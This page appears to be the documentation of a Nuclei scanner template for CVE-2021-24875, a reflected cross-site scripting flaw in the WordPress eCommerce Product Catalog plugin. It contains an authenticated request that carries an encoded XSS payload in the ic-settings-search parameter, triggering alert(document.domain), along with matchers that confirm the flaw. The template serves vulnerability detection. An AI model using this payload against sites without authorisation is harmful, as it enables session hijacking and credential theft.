WordPress eCommerce Product Catalog <3.0.39 - Cross-Site Scripting
ID: CVE-2021-24875
Severity: medium
Author: r3Y3r53
Tags: cve2021,cve,wp,authenticated,wpscan,ecommerce-product-catalog,xss,wordpress,wp-plugin,implecode
Description
Section titled “Description”WordPress eCommerce Product Catalog plugin before 3.0.39 contains a cross-site scripting vulnerability. The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
YAML Source
Section titled “YAML Source”id: CVE-2021-24875
info: name: WordPress eCommerce Product Catalog <3.0.39 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | WordPress eCommerce Product Catalog plugin before 3.0.39 contains a cross-site scripting vulnerability. The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 3.0.39. reference: - https://wpscan.com/vulnerability/652efc4a-f931-4668-ae74-a58b288a5715 - https://nvd.nist.gov/vuln/detail/CVE-2021-24875 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24875 cwe-id: CWE-79 epss-score: 0.00143 epss-percentile: 0.50073 cpe: cpe:2.3:a:implecode:ecommerce_product_catalog:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: implecode product: ecommerce_product_catalog framework: wordpress tags: cve2021,cve,wp,authenticated,wpscan,ecommerce-product-catalog,xss,wordpress,wp-plugin,implecode
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(body_2, "alert(document.domain)")' - 'contains(body_2, "eCommerce Product Catalog")' condition: and# digest: 490a00463044022006a19d9e6039faf2c2d108280b01f53dc257334485eb1f16e4caaa82c846fdf40220463e465b763421fe9b0f78f7731356831ab0cb30938222b563a0f25f382313d3:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24875.yaml"